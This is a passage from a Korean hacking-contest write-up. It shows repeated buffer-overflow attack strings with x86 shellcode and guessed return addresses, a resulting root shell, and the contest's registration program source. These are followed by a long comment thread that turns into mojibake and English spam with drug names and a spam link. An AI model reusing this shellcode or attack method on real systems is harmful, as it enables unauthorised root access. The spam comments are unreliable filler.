\x90\x90\x90\xeb\x19\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c\x88\x46\x07\x8b\x5e\x08\x8d\x4e

\x08\x8b\x56\x0c\xb0\x0b\xcd\x80\xe8\xe2\xff\xff\xff/tmp/nz","\x04\xf1\xff\xbf"'`

attack string : ./go 218.149.4.32 777 123.234.123.234 777 `perl -e 'print "\x90\x90\x90

\x90\x90\xeb\x19\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c\x88\x46\x07\x8b\x5e

\x08\x8d\x4e\x08\x8b\x56\x0c\xb0\x0b\xcd\x80\xe8\xe2\xff\xff\xff/tmp/nz","\x04\xf2\xff\xbf"'`

attack string : ./go 218.149.4.32 777 123.234.123.234 777 `perl -e 'print "\x90\x90\x90

\x90\x90\xeb\x19\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c\x88\x46\x07\x8b\x5e

\x08\x8d\x4e\x08\x8b\x56\x0c\xb0\x0b\xcd\x80\xe8\xe2\xff\xff\xff/tmp/nz","\x04\xf3\xff\xbf"'`

attack string : ./go 218.149.4.32 777 123.234.123.234 777 `perl -e 'print "\x90\x90\x90\x90

\x90\xeb\x19\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c\x88\x46\x07\x8b\x5e\x08

\x8d\x4e\x08\x8b\x56\x0c\xb0\x0b\xcd\x80\xe8\xe2\xff\xff\xff/tmp/nz","\x04\xf4\xff\xbf"'`

attack string : ./go 218.149.4.32 777 123.234.123.234 777 `perl -e 'print "\x90\x90\x90

\x90\x90\xeb\x19\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c\x88\x46\x07\x8b\x5e\x08

\x8d\x4e\x08\x8b\x56\x0c\xb0\x0b\xcd\x80\xe8\xe2\xff\xff\xff/tmp/nz","\x04\xf5\xff\xbf"'`

attack string : ./go 218.149.4.32 777 123.234.123.234 777 `perl -e 'print "\x90\x90\x90\x90

\x90\xeb\x19\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c\x88\x46\x07\x8b\x5e\x08

\x8d\x4e\x08\x8b\x56\x0c\xb0\x0b\xcd\x80\xe8\xe2\xff\xff\xff/tmp/nz","\x04\xf6\xff\xbf"'`

attack string : ./go 218.149.4.32 777 123.234.123.234 777 `perl -e 'print "\x90\x90\x90\x90\x90\xeb\x19\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c\x88\x46\x07\x8b\x5e\x08\x8d

\x4e\x08\x8b\x56\x0c\xb0\x0b\xcd\x80\xe8\xe2\xff\xff\xff/tmp/nz","\x04\xf7\xff\xbf"'`

attack string : ./go 218.149.4.32 777 123.234.123.234 777 `perl -e 'print "\x90\x90\x90\x90\x90\xeb\x19\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c\x88\x46\x07\x8b\x5e\x08\x8d

\x4e\x08\x8b\x56\x0c\xb0\x0b\xcd\x80\xe8\xe2\xff\xff\xff/tmp/nz","\x04\xf8\xff\xbf"'`

attack string : ./go 218.149.4.32 777 123.234.123.234 777 `perl -e 'print "\x90\x90\x90\x90\x90\xeb\x19\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c\x88\x46\x07\x8b\x5e\x08\x8d

\x4e\x08\x8b\x56\x0c\xb0\x0b\xcd\x80\xe8\xe2\xff\xff\xff/tmp/nz","\x04\xf9\xff\xbf"'`

attack string : ./go 218.149.4.32 777 123.234.123.234 777 `perl -e 'print "\x90\x90\x90\x90\x90\xeb\x19\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c\x88\x46\x07\x8b\x5e\x08\x8d

\x4e\x08\x8b\x56\x0c\xb0\x0b\xcd\x80\xe8\xe2\xff\xff\xff/tmp/nz","\x04\xfa\xff\xbf"'`

attack string : ./go 218.149.4.32 777 123.234.123.234 777 `perl -e 'print "\x90\x90\x90\x90\x90\xeb\x19\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c\x88\x46\x07\x8b\x5e\x08\x8d

\x4e\x08\x8b\x56\x0c\xb0\x0b\xcd\x80\xe8\xe2\xff\xff\xff/tmp/nz","\x04\xfb\xff\xbf"'`

attack string : ./go 218.149.4.32 777 123.234.123.234 777 `perl -e 'print "\x90\x90\x90\x90\x90\xeb\x19\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c\x88\x46\x07\x8b\x5e\x08\x8d

\x4e\x08\x8b\x56\x0c\xb0\x0b\xcd\x80\xe8\xe2\xff\xff\xff/tmp/nz","\x04\xfc\xff\xbf"'`

[1]+  Stopped                 ./auto

 

sh-2.05b# uname -na

Linux guru 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux

sh-2.05b# ~

 

Root를 획득한 후에 등록을 하였는데 그 내용을 복사해놓지를 못했다.

 

그래서 Root의 권한으로 읽을 수 있는 파일 하나를 뿌린다.

 

sh-2.05b# cat auth_root.c

#include <stdio.h>

#include <time.h>

 

int main()

{

        struct tm *tm_ptr;

        time_t the_time;

        char serial[21];

        char message[100];

        FILE *fp;

 

        printf("축하합니다.!\n");

        printf("고유번호를 입력해 주십시오 : ");

        fgets(serial, 20, stdin);

 

        time(&the_time);

        tm_ptr = gmtime(&the_time);

 

        sprintf(message, "%02d:%02d:%02d, %s", tm_ptr->tm_hour-15,

        tm_ptr->tm_min, tm_ptr->tm_sec, serial);

        fp = fopen("/RegisterRoom/check_root.txt", "a");

        fputs(message, fp);

        fclose(fp);

 

        printf("등록 완료되었습니다.\n");

}

 

후기 :

 

올해로 해킹 대회에 3년째 참가를 한다.. 매번 대회 참가를 하면서 느끼는 것은

늘 새로운 기술들이 대회때마다 나와서 나를 당황케 한다는 것이다.

나름대로 여기저기 정보를 꾸준히 획득하러 다닌다고 생각은 하지만 이렇게

새로운 문제들을 만나게 될 때마다 이 바닦의 깊이에 두려움이 앞선다.

 

이번 대회의 문제는 거의 대부분 newager 군의 코딩으로 이루어 졌다.

나는 옆에서 어찌어찌 하라고 코치한 것 밖에 없는 것 같다.

 

Newager 군에게 이 자리를 빌어 감사를 드린다.

 

 

 

** 입상자에게 한마디!! **

 

 

dirando : 잘보았습니다. 감사합니다.^^ .
loafers : 잘보았습니다. 축하드립니다. newager님 멋지네요. .
blksaint : 축하해요.. 머찌당..^^ .
w0rm9 : good job-_-)=b .
x90c : 좀이따 다시 훌터봐야겠네요 ^^; .
x90c : 수고하셨어요 .
secuboy : 헉! 중간에 검열을 당했네요? ㅠㅠ guru1 최초 문제분석 해놓은게 통째로 ... .
mirable : 헉~! 그런게 있었나요? 다시 한번 봐야겠네요~ .
mirable : 아.. 중간에 짤린게 맞네요.. 수정해 드렸구요~ word에서 변환하신걸 나모웹에디터로 .
mirable : 수정하니까 에러가 많이 나더라구요. 다음 번엔 html로 부탁드려요.^^; .
낭만쟁이 : 우와 대단하시네욤 ㅠㅠ 어질어질..ㅠㅠ .
낭만쟁이 : 축하드립니다.^^ .
김봉남어린이 : 대단하십니당.. 정말로..~!! .
DarkSlayer : 울 팀 입장에서 봤을때는 엄청!!!!!!!! 대단하십니다 -_-;;; 진짜루..;;;; 추카추카!! .
grinroad : 많은것을 얻었고,배웠네요...도움많이 되었고,축하드립니다... .
원재아빠 : 멋져요.. .
세벌쉭 : 축하합니다. 문서좀 빌려 갑니다. ^.^ .
secuhack : Newager님 수고하셨어요~ ^^ .
hansolo : Newager 님 외계인 맞죠? -_-; ㅎㅎ .
jang_tech : Newager님 대단하네요~~ .
김태균 : kim394@korea.com 메신저는 kim394@hotmail.com 입니다. .
병팔이 : 대단하다 .
말동가리 : 우와 대단하다..-ㅁ--;;; .
해커지망생 : 뭔소린지~~까마득하넹~~ .
: .
나 : 리눅스와 C 를배우기전엔 저것이 무슨말인지 몰랐다. 리눅스와 C의 기초를 배우자 약간 이해가된다 신기하다 .
깨는군... : 약간 이해가되나?? 기계어를 어케 저렇게 알수있을까?? 왈라 깬다 .
어질... : 그게 어셈불리어인가 ...? .
binish : 멋지심! .
df : df .
착한늑대 : 뭐가뭔지하나도 모르겠어요 .
love : 멋진 보고서 잘 봤습니다. .
hackers : 대단하십니다. ㅊㅋㅊㅋ..^^; 열시미 공부해야겠다. .
MatrixHack : 저 이제 초보생인데 .. 먼 말인지 모르겟지만 .. 대단 하다는 생각밖에 안드는군요 .. 진심으루 軸 .
DarkHacker : 결혼식장이나 가지. .
: .
hewtea : 고생많앗네요 .
: .
인터넷공학부 : c언어를 파악하다니..외계인 인정!! ㅋㅋㅋ .
웁 : 헉!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.... .
동국 : 해킹 선생님 모십니다... -ㅁ-;; .
Boss_hacke : 축~~ 파악은 안되어도 흐름을 알아 기쁩니다. .
musado : 흐흡... 아직 제수준으론 이해조차 못하겠네요 ^^; 암튼 ㅊㅋㅊㅋ~ .
darkness : 대중어느정도까지만이해 아직공부가모자른가보다 .
헐 : 무슨말이지 몬 알아듣겟다 .
크크크큭큭 : 공부하려다가 21살이나 되먹은 놈인데요 아직도 완전히 하나도 모르지만 언젠가는 꼭따라잡을날을 기다리겠습니다. .
: .
대단대단 : 나는 언제 저렇게 될라나 ㅜ,.ㅜ .
anjrk : 뭐가 뭔소린지 모르겠지만 엄청 대단하단건 인정학수밖에 없네요. 저도 나이가 먹을대로 먺은 상태에서 시작하려고 .
anjrk : ...하는데 가능할련지 모르겟군요. 처음으로 들린 이곳 넘 멋지네요 .
뭐가뭔말인지.. : 나중에 저도 위대한 해커가 될수 있겠죠... .
바보 : 언제저정도될라나 .
: .
       : 재밌었겟다..해킹대회... .
나당 : 오늘 첨으로 이 홈에 와서 넘 좋았는데...해킹대회 보고서를 보고 갑자기 실망이 앞선당...언제 저렇게까지 .
leepy : 대단하시네요... 보고서두 멋지구여.. .
: .
lasthacker : ㅋ 몬 말 일까낭? 근데 딧따 재밋엇 겟당..휴~난언제나 저정도 실력이되나? .
eunshik90 : 뭔소린지 하나도 모르겠다 난 언제 저실력되나 .
local : 나두 나중에 도전해봐야지 .
gdfh : dfh .
gfjgfj : 초고수당 ^^ .
쩌비 : 디스어셈도 해야하는군요..;; 까마득 하네요..괜히봤다 ㅎㅎ .
: .
상민12340 : 대단하시네여;; 난 이거 몇년이 걸려야 풀 문제 같다; .
: .
line7979 : 어셈블리언어 대박 --;;; .
frista : 어셈을 꼭 알아야 하는구나.. 훔.. .
tkem : 어셈블리언어;; 부럽다.;; .
: .
nari : 모르겠다. 뭔소린지...열심히 하자 공부~ 아자아자 파이팅!! .
해킹완료 : ----여기까지의 IP가 모두 해킹되었습니다---- .
해킹완료2 : 위에 너도 해킹되었습니다. .
: .
: .
해커세계 : 무슨 소린가~~~~ 아무리 공부해도 모르겠다;; 저런건 어디가면 배울수가있지?? .
대단하다 : 이정도 실력이면 쪽빠리들하고 한판 붙어도 될듯 보이는데;; 쪽빠리 대회 쓸어보지;;; .
perfume : 아.. 나도 언젠가는 저런날이 오겠지.. 해커가 되고싶다 너무나. .
허헛.. : 문제 푸는님이 이정도면 출제자측은..(-┏) .
-ㅁ-; : 83쪽에 달하는 내용을 작성하신(전부 다는 아닐지라도)secuboy님께 박수! .
q : .
fg : tfrt .
멍멍 : .
와우 : 정말멋잇어용 ㅎ .
musjigun : 대단하시네요 부러워요^^ .
머가먼지.. : 머가먼지 모르겟다 OTL .
울프 : 흠..나도열시미해야짐..ㅠ .
로그 : 대단합니다.. .
dd : 아직도 대는강; .
마커 : 저렇게 단시간에.. ;;;; .
워니 : 그곳이 궁금하네요-_-)b .
부러워라 : 나도 저렇게 하기위해 배워야지~! 도움좀여 .
Hacker : 초보자인데;;;;; 너무 어렵잖아욧!!! .
황태자 : 해킹 까짓거 뭐그냥 대충 명령어 뭐 어쩌고 끄직끄직 대충 그으면되는거아녀~ .
앞으로천재 : ㅠ.ㅠ 누가 이런거 전문적으로 해킹하는거 가르켜주실분없나? 나도 해킹 배우고 싶어 여름방학때 독학할건데 어디 .
앞으로천재 : 서 배우냐 막막하다 .
....... : .
..... : 나도언젠가는!!!!! .
GAKO : 이제 보내요^^ 부럽습니다, 계속 발전하시길 바랄게요^^ 저도, 또한.. .
리얼재희군 : 멋져요~~! 어셈이나 배워볼까 ㄷㄷ .
: .
: .
: .
: .
?? : ѱ ̴° .
: .
: .
cdf : dasfdas .
'='' -- : '='' -- .
han9551 : 유니코드로 해서 보세요 .
han9551 : ڵ ؼ .
: .
root : .
ǿ : .. .. .
: .
: .
: .
ju : ujuj .
Ty : ~ ¯̴~ .
Acard : 내 너를 뛰어넘어주마. 반드시 .
달콩oi : 흐미..무셔라...저정도믄 머 왠만한곳은 기냥뜰리것네 ;; .
: .
: .
: .
: regr .
kdjkj : df .
gingtom : 와 대단해요 .
123 : ̴µ..; .
: ? .
dsdsd : sdsdsd .
dtd : dtd .
robinson : noc como decirte lo q siemto .
sad : asdas .
김영환 : 저런 코드들은 자동으로 들어 지는건가요? 아니면 일일이 손으로 치는건가요 ;;? .
: .
: ͳ .
ؼ : Ѥ .
: .
궵뤱1 : 쓧뤶뤱쫫һһѶѤƽ .
: .
tcnwyzqtol : uOilDbRkzaKjhs .
: .
dlrj : ? .
Acuros : 우왕.. 대단하시네요. 좋은자료 감사합니다. .
: ffff .
Nobless : ۾...; .
: .
: .
svvqldmyui : QaHLqdoAOgMoz .
: .
gg : ggg .
das : Ӵ .
: .
Ե..... : Ե... ڵ ǿ .
: ㅋㅋㅋ .
chunsat : 우와..감동적이네요,. .
: .
dsg : sgddgs .
dsg : sgddgs .
JimmiXzS : wh3Zrw http://www.FyLitCl7Pf7kjQdDUOLQOuaxTXbj5iNG.com .
Bryant : What do you do for a living? .
Elijah : very best job .
Andres : I'd like to transfer some money to this account .
Merlin : I was born in Australia but grew up in England .
Arnold : I'm sorry, I'm not interested .
Kyle : We'd like to offer you the job .
Willard : My battery's about to run out .
Darnell : Do you know each other? .
Elliott : I'd like , please .
Eldridge : I read a lot .
Rachel : Where do you study? .
Hector : A book of First Class stamps .
Thaddeus : I've lost my bank card .
Buddy : Go travelling .
DE : Could you ask her to call me? .
Hailey : The manager .
Dghonson : Children with disabilities .
Eliseo : Very Good Site .
Andrea : I'd like to send this to .
Nickolas : It's funny goodluck .
Franklyn : When do you want me to start? .
Rodger : Would you like a receipt? .
Gerry : Languages .
Seth : What company are you calling from? .
Daniel : I've lost my bank card .
Cletus : Children with disabilities .
Cameron : Enter your PIN .
Darell : Some First Class stamps .
Travis : I'm only getting an answering machine .
Harvey : There's a three month trial period .
Keith : I like it a lot .
Truman : International directory enquiries .
Jamar : I'm unemployed .
Abigail : Where did you go to university? .
Jesse : Do you like it here? .
Lenny : I've come to collect a parcel .
Phillip : I'd like to send this parcel to .
Wesley : Not in at the moment .
Faustino : How long have you lived here? .
Russell : I'm not interested in football .
Freddie : Pleased to meet you .
Phillip : Some First Class stamps .
Darren : I live in London .
Marissa : Incorrect PIN .
Rodney : I'm a trainee .
Denver : Could I take your name and number, please? .
Cody : I'm originally from Dublin but now live in Edinburgh .
Valentine : We'll need to take up references .
Rayford : I sing in a choir .
Amelia : Have you got any ? .
Desmond : How much is a First Class stamp? .
Audrey : I'll put him on .
Camila : Incorrect PIN .
Lazaro : We need someone with experience .
Crazyfrog : Could you tell me my balance, please? .
Steve : An envelope .
Jesus : I've been cut off .
Molly : What's your number? .
Vanessa : How much will it cost to send this letter to ? .
Felix : I'd like to take the job .
Tracey : The manager .
Mariano : A packet of envelopes .
Neville : Accountant supermarket manager .
Elroy : Could I borrow your phone, please? .
Dustin : I'd like a phonecard, please .
Behappy : International directory enquiries .
Razer22 : I enjoy travelling .
Javier : Do you know the number for ? .
Gilberto : Could you send me an application form? .
Buford : The line's engaged .
Everett : Do you like it here? .
Savannah : How many more years do you have to go? .
Magic : I'm a partner in .
Amber : Could you transfer $1000 from my current account to my depos .
Steven : What's the last date I can post this to to arrive in time f .
Spencer : I'll text you later .
Chris : I can't stand football .
Gracie : I'd like to open an account .
Gerald : I'd like to transfer some money to this account .
Rufus : I sing in a choir .
Jasmine : Directory enquiries .
Marty : I'm a partner in .
Freddie : How much notice do you have to give? .
Jarvis : I like watching TV .
Willy : Could you transfer $1000 from my current account to my depos .
Emery : Could you give me some smaller notes? .
Barney : I can't get a signal .
Goodboy : I hate shopping .
Lindsey : Which university are you at? .
Amia : I'd like to change some money .
Getjoy : Why did you come to ? .
Crazyivan : I need to charge up my phone .
Logan : Have you got a current driving licence? .
Alex : Do you know the address? .
Alfred : I'm originally from Dublin but now live in Edinburgh .
Ronald : Recorded Delivery .
utadrhcz : 9AfkG0 sldytswhjowj, .
Stanley : This is your employment contract .
Archie : What are the hours of work? .
Owen : I'm on holiday el .
Armand : Until August buy .
Carey : How many weeks' holiday a year are there? ho .
Edmond : I'd like to pay this in, please .
Eliseo : I'd like , please sild .
Lemuel : A few months d .
Weston : Which team do you support? .
Lucio : I'm not sure .
Stanford : What's the last date I can post this to to arrive in time f .
Wiley : I'd like to open a personal account .
Eugene : Photography catapres .
Rudolf : Will I have to work shifts? .
Amber : Recorded Delivery buy .
Jamison : Children with disabilities precio .
Manual : Free medical insurance buy .
Richard : I work for a publishers .
Jordan : I'd like to open an account .
Maximo : I've got a very weak signal .
Andre : Just over two years c .
Darell : Could you tell me my balance, please? .
Kermit : I can't hear you very well .
Silas : We were at school together .
Brooks : I'm happy very good site .
Silas : Who's calling? .
Elden : A company car .
Bernard : Would you like a receipt? .
Ella : I can't get a dialling tone .
Alvaro : It's funny goodluck .
Kelly : I'd like to cancel a cheque .
Lloyd : A pension scheme ge .
Fifa55 : I'm doing a masters in law .
Merrill : I've got a very weak signal .
Brock : Which year are you in? .
Guillermo : I'm training to be an engineer .
Darron : A few months cat .
Sandy : I'll send you a text si .
Carol : I'm a trainee buy .
Derrick : I'm on a course at the moment ana .
Infest : Whereabouts are you from? reglan .
Wally : I'm a member of a gym .
Alfredo : Until August .
Ernest : The line's engaged generic .
Seymour : Looking for work lo .
Bob : How much is a Second Class stamp? altace .
Arron : Just over two years .
Scotty : I like it a lot .
Hilario : I hate shopping .
Brenton : I'd like to transfer some money to this account .
Rudolf : I work here prazos .
Morton : Withdraw cash .
Timmy : I've just started at .
Ronny : I'm only getting an answering machine .
Ethan : I've got a full-time job .
Dudley : I'm happy very good site .
Quentin : I'll text you later .
Dirtbill : Free medical insurance can you ord .
Carlton : I'll call back later .
Dwayne : I'd like to open a personal account me .
Albert : How many days will it take for the cheque to clear? .
Pasquale : Where are you calling from? .
Cecil : History tobramy .
Melanie : Children with disabilities .
Sean : I need to charge up my phone .
Sonny : A staff restaurant .
Freelove : I love the theatre para .
Logan : Which year are you in? .
Rigoberto : I like watching football .
Hilario : Insert your card noro .
Alphonso : About a year norfloxa .
Fidel : I'd like to cancel a cheque .
Cesar : When can you start? adal .
Lillian : Please wait .
Danial : Could I ask who's calling? .
Antonia : Will I have to work shifts? .
Chester : Insufficient funds .
Theodore : One moment, please ca .
Claire : I'm a partner in .
Darrell : I never went to university .
Mishel : Through friends ca .
Hyman : I work here generic tre .
Harris : I like watching TV .
Cristopher : Sorry, I'm busy at the moment zantac .
Gavin : How many would you like? .
Ernest : Where's the nearest cash machine? .
Spencer : Can I use your phone? .
Wyatt : I work with computers z .
Damon : I'm not sure ord .
Domingo : There's a three month trial period me .
Darren : Have you got any qualifications? .
Kerry : I work here frumil bnf .
Chance : I can't get a dialling tone .
Abraham : Have you got any qualifications? .
Jerrold : What do you want to do when you've finished? .
Sylvester : I never went to university .
Charles : I wanted to live abroad .
Alfredo : I'd like to order some foreign currency .
Vaughn : I'm not sure .
Walter : I don't like pubs .
Emilio : I've just graduated .
Philip : I'd like to take the job .
Getjoy : I can't get a signal .
Warner : Directory enquiries pu .
Ezekiel : Which team do you support? .
Sophia : I don't like pubs .
Megan : History lopressor .
Alberto : Special Delivery ord .
Granville : Do you know the number for ? .
Peter : I study here f .
Dalton : The line's engaged .
Rodger : Where's the postbox? how to g .
Orville : Enter your PIN .
Jermaine : Recorded Delivery .
Myles : On another call .
Trinidad : How many days will it take for the cheque to clear? .
Fredric : I'd like to tell you about a change of address .
Jackson : What line of work are you in? .
Caroline : I do some voluntary work .
Marion : What university do you go to? .
Truman : Where are you from? .
Newton : I'd like to open a business account .
Stephen : I'd like to tell you about a change of address .
Emory : I'd like to apply for this job purchas .
Franklin : What are the hours of work? .
Elbert : I've lost my bank card .
Melvin : How would you like the money? .
Burton : Is there ? spo .
Casey : real beauty page .
Emory : Could I borrow your phone, please? .
Coco888 : A Second Class stamp .
Trinity : Thanks for calling .
Devin : I'm sorry, she's .
Brooklyn : I love this site .
Reynaldo : Do you like it here? .
Erin : Gloomy tales .
Jaime : The manager .
Serenity : The manager .
Danny : I'd like to order some foreign currency .
Lawerence : What's the interest rate on this account? .
Erin : What sort of music do you like? amary .
Christophe : How many weeks' holiday a year are there? robaxin a .
Darrell : What part of do you come from? .
Stephanie : I'd like to send this parcel to .
Merle : I don't like pubs .
Arianna : Who do you work for? .
Herbert : Could I order a new chequebook, please? .
Earnest : What do you study? .
Royal : There's a three month trial period .
Samantha : I'd like to change some money .
Rebecca : Whereabouts in are you from? .
Steven : perfect design thanks prov .
Broderick : magic story very thanks .
Mariano : Whereabouts in are you from? .
Bryant : Recorded Delivery .
Jarrett : I'd like to change some money .
Alfred : Could you tell me my balance, please? .
Waylon : I'm only getting an answering machine .
Chuck : This is the job description .
Tanner : I've just started at .
Ronnie : We need someone with experience .
Jozef : I'm a member of a gym .
Quintin : I'd like to cancel this standing order .
Tyson : I saw your advert in the paper .
Billie : I'm sorry, I didn't catch your name .
Warren : Thanks funny site .
Winfred : I'm sorry, I didn't catch your name .
Janni : We need someone with qualifications .
Jennifer : Excellent work, Nice Design .
Maurice : Can you hear me OK? .
Sophia : I've only just arrived .
Rhett : Could you please repeat that? .
Samual : I saw your advert in the paper .
Boris : What company are you calling from? .
Chang : I live in London .
Nevaeh : Jonny was here .
Moses : I'd like some euros .
Kraig : Could I make an appointment to see ? .
Stacey : I'm self-employed .
Lonnie : Lost credit card .
Bennie : Would you like to leave a message? .
Jerrell : Some First Class stamps .
Kelvin : I can't get a dialling tone .
Russel : Where's the postbox? .
Harrison : My battery's about to run out .
Aidan : An accountancy practice .
Leopoldo : Looking for a job .
Darrell : An accountancy practice .
Emery : A company car order clo .
Ella : I'd like to open a personal account .
Terence : A Second Class stamp .
Franklin : What part of do you come from? .
Aurelio : Very funny pictures .
Gordon : I'd like to open a business account .
Gregory : I'm afraid that number's ex-directory .
Layla : Pleased to meet you .
Loren : Could you send me an application form? .
Heriberto : I can't get a signal .
Ernest : Go travelling .
Heriberto : Withdraw cash .
Teddy : I'm a partner in .
Victoria : How do you spell that? .
Madison : Do you need a work permit? .
Damion : Have you got any ? bes .
Giovanni : How would you like the money? .
Randy : What qualifications have you got? .
Arnulfo : Do you know the address? .
Orville : Could I ask who's calling? .
Donte : I'm happy very good site .
Duane : Where's the nearest cash machine? .
Olivia : How much is a Second Class stamp? .
Jeffry : I'd like to open a personal account .
Jorge : I'm happy very good site .
Mauricio : Another service? illeg .
Andrew : What sort of music do you listen to? .
Darwin : Accountant supermarket manager .
Roger : Could I have an application form? .
Frederick : We've got a joint account .
Josue : I'd like to cancel this standing order .
Davis : There's a three month trial period duri .
Ava : Yes, I love it! .
Marlon : Where do you come from? .
Ezekiel : I like it a lot .
Elizabeth : Would you like to leave a message? h .
Gregg : Could you send me an application form? .
Darrick : I was born in Australia but grew up in England zen .
Dusty : A few months lynoral .
Shelton : Photography cheape .
Garrett : What do you do for a living? .
Luther : Could you send me an application form? .
Tomas : I'm doing an internship .
Norman : About a year .
Heath : Looking for a job .
Jimmy : Do you have any exams coming up? .
Patric : I'm doing a masters in law .
Gianna : No, I'm not particularly sporty .
Palmer : Will I get travelling expenses? .
Alden : this is be cool 8) .
Tyson : I'm training to be an engineer .
Juan : real beauty page .
Gabriel : I'd like to send this letter by .
Hershel : I study here po .
Marcelo : I don't know what I want to do after university .
Alfred : We need someone with experience .
Daniel : Have you got any ? .
Chong : I've got a very weak signal .
Mitchel : I want to report a .
Jozef : Wonderfull great site .
Grady : Recorded Delivery .
Britt : Where's the nearest cash machine? .
Andreas : Thanks funny site .
Gayle : I'd like to order some foreign currency .
Brett : What's the last date I can post this to to arrive in time f .
George : Could you tell me the number for ? .
Ricky : A few months .
Johnnie : What's the current interest rate for personal loans? .
Freelove : I work for myself .
Rachel : I'm retired .
Augustus : I'd like to open a personal account .
Sandy : Hello good day .
Josue : We were at school together .
Diva : It's OK .
Andrea : I came here to study .
Britt : Have you got a current driving licence? .
Teodoro : Is it convenient to talk at the moment? .
Freddy : Have you read any good books lately? .
Felipe : Can I use your phone? .
Lamar : Could I order a new chequebook, please? .
Cedrick : I'd like to send this letter by .
Rachel : What's the current interest rate for personal loans? .
Winford : It's OK .
Jerrell : How much does the job pay? .
Isiah : Could I make an appointment to see ? .
Gregorio : I need to charge up my phone .
Lavern : I was born in Australia but grew up in England .
Sofia : Enter your PIN .
Jeromy : Could you ask him to call me? .
Roderick : I'm a housewife .
Darnell : An envelope .
Jamie : I'd like a phonecard, please .
Michale : I'd like to pay this cheque in, please .
Gabriel : Who would I report to? .
Riley : What sort of music do you listen to? .
Britt : I'm on holiday .
Elvin : Could you ask her to call me? .
Jacob : I'd like a phonecard, please .
Loren : i'm fine good work .
Isaias : Will I get travelling expenses? .
Autumn : We'll need to take up references .
Millard : Could you please repeat that? .
Wilbur : Could you please repeat that? .
Sheldon : In a meeting .
Clifton : Have you got any ? .
Boyce : Best Site Good Work .
Jonah : I'm sorry, she's .
Romeo : A few months .
Sanford : Could you please repeat that? .
Bernard : I came here to study .
Delbert : It's serious .
Sylvester : I came here to work .
Genaro : I'm sorry, I didn't catch your name .
Issac : Do you know each other? .
Sandy : Where did you go to university? .
Gobiz : Children with disabilities .
Junior : We need someone with experience .
Mario : We used to work together .
Levi : Which year are you in? .
Freelove : I've lost my bank card .
Angelina : Nice to meet you .
Terry : Your cash is being counted .
Esteban : Could I make an appointment to see ? .
Dewitt : How much does the job pay? .
Forest : Punk not dead .
Cordell : In tens, please (ten pound notes) .
Heath : What line of work are you in? .
Carmen : this is be cool 8) .
Franklyn : I'll put her on .
Adam : I'd like to take the job .
Tomas : I'm doing a masters in law .
Ella : One moment, please .
Norman : Are you a student? .
Zackary : US dollars .
Wayne : I'm a trainee .
Arron : I work for myself .
Donny : I'd like to send this to .
Liam : Could you ask him to call me? .
Orlando : Do you need a work permit? .
John : Will I get paid for overtime? .
Barbera : A jiffy bag .
Kareem : Just over two years .
Rusty : I stay at home and look after the children .
Lance : I read a lot .
Molly : I'm doing a masters in law .
Denis : this is be cool 8) .
Nicky : Languages .
Edwardo : I love the theatre .
Norman : Not available at the moment .
Lioncool : I'm a member of a gym .
Zachariah : Insert your card .
Humberto : Please call back later .
Lewis : I live here .
Stephen : I work for a publishers .
Johnny : Not in at the moment .
Riley : About a year .
Alejandro : A First Class stamp .
Destiny : Good crew it's cool :) .
Emerson : We're at university together .
Rashad : Have you got any qualifications? .
Carey : Recorded Delivery .
Amia : Do you know each other? .
Antione : good material thanks .
Chong : I'm not interested in football .
Chang : Would you like to leave a message? .
Dudley : I love this site .
Glenn : I went to .
Randy : Special Delivery .
Berry : Free medical insurance .
Edwardo : Do you know what extension he's on? .
Stuart : Very interesting tale .
Derrick : Looking for work .
Amber : Could you give me some smaller notes? .
Reynaldo : Photography .
Irving : I'm on holiday .
Silas : I like it a lot .
Kaylee : Withdraw cash .
Jacques : Could you give me some smaller notes? .
Augustine : I want to report a .
Reuben : I'd like to open a business account .
Maria : History .
Sydney : Children with disabilities .
Bailey : I really like swimming .
Jefferson : I'd like to cancel a cheque .
Pitfighter : The National Gallery .
Miles : Where are you from? .
Levi : Enter your PIN .
Abigail : What's the exchange rate for euros? .
Enoch : Please wait .
Isreal : I didn't go to university .
Deandre : I'd like to open a personal account .
Daryl : In a meeting .
Peter : I never went to university .
Ellis : I'm training to be an engineer .
Berry : It's a bad line .
Elmer : This site is crazy :) .
Willis : I've got a part-time job .
Gabriella : I wanted to live abroad .
Sonny : Very funny pictures .
Grace : How much is a First Class stamp? .
Clement : A financial advisor .
Alexander : How would you like the money? .
Agustin : I've only just arrived .
Danilo : When can you start? .
Albert : We went to university together .
Geoffrey : Can you hear me OK? .
Howard : It's OK .
Jesse : Other amount .
Shelton : How do you know each other? .
Ezequiel : this is be cool 8) .
Toney : Children with disabilities .
Bruce : good material thanks .
Quentin : I don't like pubs .
Leonardo : I've only just arrived .
Ezequiel : I'm about to run out of credit .
Shannon : I'd like to apply for this job lip .
David : Are you a student? .
Henry : I'm about to run out of credit .
Eldridge : I'm not interested in football .
Elroy : It's OK .
Bruce : I'm a partner in .
Ashley : Go travelling .
Gerard : Insufficient funds .
Alex : What sort of work do you do? .
Eldon : How much is a First Class stamp? .
Mohammed : I'm not working at the moment .
Kareem : We work together .
Magic : Could you transfer $1000 from my current account to my depos .
Gustavo : How do you spell that? .
Eldon : I'm in my first year at university .
Mitchell : Hello good day .
Damien : Excellent work, Nice Design .
Erick : Your account's overdrawn .
Leroy : I work here .
Trinidad : Nice to meet you .
Charlie : I'd like to apply for this job .
Frankie : Do you have any exams coming up? .
Unlove : I can't get a signal .
Orval : I work for a publishers .
Maya : Is it convenient to talk at the moment? .
Floyd : We'll need to take up references .
Johnathon : We were at school together .
Ferdinand : In tens, please (ten pound notes) .
Hershel : I've lost my bank card .
Melissa : What sort of music do you like? .
Chance : Will I have to work shifts? .
Destiny : I'm on holiday .
Garret : I'd like to open a business account .
Antwan : A Second Class stamp .
Norbert : A few months .
Alexis : Thanks for calling .
Broderick : I'm happy very good site .
Lanny : I never went to university .
Kareem : History .
Kelvin : What company are you calling from? .
Payton : Please wait .
